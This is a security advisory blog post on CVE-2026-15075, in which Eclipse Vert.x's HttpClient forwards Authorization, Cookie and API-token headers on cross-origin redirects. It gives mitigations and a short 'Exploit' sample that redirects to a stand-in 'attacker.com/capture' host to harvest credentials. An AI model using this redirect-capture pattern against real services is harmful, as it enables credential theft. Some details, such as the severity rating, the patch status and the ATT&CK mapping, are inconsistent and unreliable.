Eclipse Vertx DefaultRedirectHandler Cross-Origin Header Propagation Vulnerability (CVE-2026-15075) [bash] -DC-Jul2026-997

Listen to this Post

How CVE-2026-15075 Works

Eclipse Vert.x is a popular reactive toolkit for the JVM, widely used to build resilient microservices and web applications. Its `vertx-core` module provides an `HttpClient` that, by default, automatically follows HTTP 30x redirect responses. This automatic redirection is handled by the `DefaultRedirectHandler` component, which transparently constructs and sends a new request to the `Location` header target without any involvement from the calling code.
The vulnerability exists in versions up to and including 4.5.29 (4.x branch) and 5.1.4 (5.x branch). When `DefaultRedirectHandler.apply` processes a redirect, it copies the entire `MultiMap` of headers from the original request into the new redirect request using options.setHeaders(resp.request().headers()). It then removes only the `Content-Length` and `Transfer-Encoding` headers before dispatching the redirected request. Critically, the handler performs zero origin validation — it does not compare the scheme, host, or port of the original URI against the redirect target URI.
This means that when a 301, 302, 303, 307, or 308 response points to a cross-origin, attacker-controlled host, all credential-bearing headers are forwarded verbatim. This includes Authorization, Cookie, Proxy-Authorization, and any custom headers like X-API-Token, X-Api-Key, or X-Session-ID.
An attacker can exploit this by inducing the Vert.x `HttpClient` to make a request that results in a redirect to a hostile domain. Common attack vectors include supplying a malicious URL to a webhook dispatcher, image proxy, URL fetcher, or any service that fetches external resources on behalf of the user. The redirected request carries the original caller’s credentials silently to the attacker’s server, where they can be logged and later used for session hijacking, privilege escalation, or lateral movement.
The vulnerability is particularly dangerous because it requires no user interaction, no special privileges, and can be triggered remotely over the network. The CVSS 3.1 base score is 7.5 (High) , and the CVSS 4.0 score is 8.2 (High) , reflecting the ease of exploitation and the high confidentiality impact. The flaw is rooted in the absence of a `isSameOrigin()` check, which in patched versions compares the `(scheme, host, port)` triplet before deciding which headers to forward.

DailyCVE Form

Platform: Eclipse Vert.x
Version: 4.5.29 & 5.1.4 (and earlier)
Vulnerability: Cross-origin header forwarding (CWE-200/CWE-346)
Severity: Critical (CVSS 3.1: 7.5 / CVSS 4.0: 8.2)
date: 2026-07-14
Prediction: Patch expected in 4.5.30 / 5.1.5 (already released)

What Undercode Say: Analytics

Check your Vert.x version in a Maven project
mvn dependency:tree | grep vertx-core
For Gradle projects
./gradlew dependencies | grep vertx-core
Alternatively, inspect the artifact directly
find . -name "vertx-core-.jar" | xargs -I {} basename {}

Analytics Insight:

This vulnerability exposes a classic “confused deputy” problem. The `HttpClient` acts as a deputy for the caller, but fails to validate the redirect target’s trustworthiness. The attack surface includes any endpoint that accepts a URL and fetches it — a pattern common in webhook systems, avatar services, OAuth flows, and API gateways. According to ATT&CK, this maps to T1566 (Phishing) and T1189 (Drive-by Compromise) for credential harvesting via redirection.

Exploit

// Vulnerable Vert.x HttpClient code
HttpClient client = vertx.createHttpClient();
client.request(HttpMethod.GET, 8080, "localhost", "/fetch")
.putHeader("Authorization", "Bearer eyJhbGciOiJIUzI1NiIs...")
.putHeader("Cookie", "session=abc123")
.putHeader("X-API-Token", "secret-api-key")
.send(ar -> {
if (ar.succeeded()) {
// Automatically follows 30x redirects
// Headers are forwarded to the Location target
}
});
// Attacker-controlled redirect response
HTTP/1.1 302 Found
Location: https://attacker.com/capture

Exploitation Scenario:

  1. The attacker supplies a URL like `https://victim.com/redirect?target=https://attacker.com/capture` to a Vert.x-based URL fetcher.
  2. The fetcher makes a request to that URL with the victim’s credentials in the headers.
  3. The victim server responds with a 302 redirect to attacker.com.
    4. `DefaultRedirectHandler` forwards all headers (including Authorization, Cookie, X-API-Token) to the attacker’s server.
  4. The attacker logs the headers and extracts the bearer token, session cookie, or API key.
    No public exploit code is available as of the disclosure date, but the attack is trivial to reproduce with a simple HTTP redirector.

    Protection

– Upgrade to Eclipse Vert.x 4.5.30 or 5.1.5 (or later), where `DefaultRedirectHandler` now performs origin validation and strips sensitive headers on cross-origin redirects.
– Disable automatic redirects in the `HttpClient` and implement a custom redirect handler that manually validates the `Location` target against an allowlist.
– Use a header allowlist: Configure the client to only forward a minimal set of safe headers (e.g., Accept, User-Agent) and explicitly drop Authorization, Cookie, and custom secret headers.
– Apply network controls such as egress filtering to prevent outbound requests to untrusted domains.
– Monitor logs for unusual redirect chains and unexpected `Location` headers in outbound requests.

Impact

  • Confidentiality Breach: Bearer tokens, Basic Auth credentials, session cookies, and API keys are leaked to attacker-controlled origins.
  • Session Hijacking: Attackers can reuse stolen cookies to impersonate legitimate users.
  • Privilege Escalation: Stolen OAuth tokens or API keys may grant access to protected resources and administrative functions.
  • Lateral Movement: Credentials harvested from one service can be reused against other internal or external systems.
  • Compliance Violations: Leakage of authentication material may constitute a breach of GDPR, HIPAA, or PCI-DSS requirements.
  • Supply Chain Risk: Any Vert.x-based application that consumes external URLs (e.g., webhook handlers, image proxies, RSS aggregators) is at risk.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top